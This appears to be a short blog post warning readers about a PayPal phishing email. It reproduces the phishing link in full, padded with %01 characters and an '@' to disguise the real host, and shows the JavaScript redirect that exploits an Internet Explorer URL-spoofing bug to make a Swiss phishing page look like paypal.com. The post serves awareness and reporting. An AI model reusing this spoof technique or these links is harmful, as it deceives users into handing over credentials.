Mike Outmesguine points us to yet another new riff on the classic PayPal scam (click thumbnail for full-size image):
I got this email that looks like it came from PayPal. Of course, I didn't believe it for a second. But I'm sure others would. Digging deeper, the URL redirects people to a site in China that uses the IE URL spoof to seem like it's sitting at paypal.com. Insidious! I reported this to Paypal and they confirmed it's a spoof site. Here's the breakdown:1. URL included in the original email:
<a href="http://www.paypal.com%01%01%01%01%01%01%
01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01
%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%
01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01
%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01
%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01
%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01
%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01
%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01
%01@pp.youlikeshe.com ">click here</a>
2. jump-off site pp.youlikeshe.com
3. Actual site being loaded (remove spaces to activate): www . Epack . Ch/p/verify.htm
4. Spoofed to appear as www.paypal.com using the IE URL spoof vulnerability
shown here:
<script language="JavaScript"> location.href=unescape('http://www.paypal.com%01@www.epack.ch/p/verify.htm
');
</script>Microsoft has not released a patch for this URL vulnerability. Now it seems there is a real-world attack, albeit only to Paypal members so far. Sneaky buggers!
Update/Correction: BoingBoing reader Fraser Cole in Ottowa says, "Hello, just a friendly note regarding the PayPal scam. I'm probably not
the first to point out that the final destination site is in the .ch domain, which of course is Switzerland, not China. Maybe since they're in Europe they can be tracked down easier?"
